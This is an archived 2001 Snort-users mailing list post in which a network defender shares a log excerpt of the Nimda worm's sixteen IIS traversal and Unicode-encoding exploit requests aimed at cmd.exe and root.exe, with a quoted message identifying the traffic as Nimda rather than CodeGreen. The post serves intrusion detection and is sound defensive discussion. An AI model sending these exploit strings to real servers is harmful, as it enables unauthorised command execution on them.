[Snort-users] Not CodeGreen

Ginnetty, James JGinnetty at ...1561...
Tue Sep 18 13:24:02 EDT 2001


Definitely not our friend code red. Our log files are showing just how
pervasive this thing is. Looks like it will try 16 different exploit strings
in an attempt to infect another server before moving on to the next IP. Here
is a sorted cut from one of the logs. It is repeated many times over from
different IP's. No wonder the level of traffic....

  Jim

14:00:43	198.146.11.167	GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
14:00:43	198.146.11.167	GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
14:00:43	198.146.11.167	GET	/c/winnt/system32/cmd.exe?/c+dir
14:00:43	198.146.11.167	GET	/d/winnt/system32/cmd.exe?/c+dir
14:00:43	198.146.11.167	GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir
14:00:43	198.146.11.167	GET	/MSADC/root.exe?/c+dir
14:00:44	198.146.11.167	GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
14:00:44	198.146.11.167	GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
14:00:44	198.146.11.167	GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
14:00:44	198.146.11.167	GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
14:00:43	198.146.11.167	GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
14:00:44	198.146.11.167	GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
14:00:44	198.146.11.167	GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
14:00:43	198.146.11.167	GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
14:00:44	198.146.11.167	GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
14:00:43	198.146.11.167	GET	/scripts/root.exe?/c+dir

-----Original Message-----
From: bthaler at ...2720... [mailto:bthaler at ...2720...]
Sent: Tuesday, September 18, 2001 3:43 PM
To: snort-users at lists.sourceforge.net
Subject: [Snort-users] Not CodeGreen


For everyone's information:

The inordinate amount of traffic you're most likely seeing today is almost
surely NOT CodeGreen.

CodeGreed was developed as a way to patch server infected with CodeRed.
What you are most likely
seeing is in fact "nimda" which by all accounts seems like the last 3 or 4
big IIS exploits
(CodeRed, Unicode, et all) rolled up into one big exploit.

Again, this is most likely NOT CodeGreen, even though some have referred to
it as that.

BTW, my Snort-1.7MySQL database has surpassed 1,000,000 records just today,
and is still going
strong.  Hows that for scaleability, baby?

I run Snort-Win32 on one NT SMP machine, and the database from another
machine, so the load gets
balanced.

Hats off to Martin R, et all.

Regards,
Brad T.


_______________________________________________
Snort-users mailing list
Snort-users at lists.sourceforge.net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users




More information about the Snort-users mailing list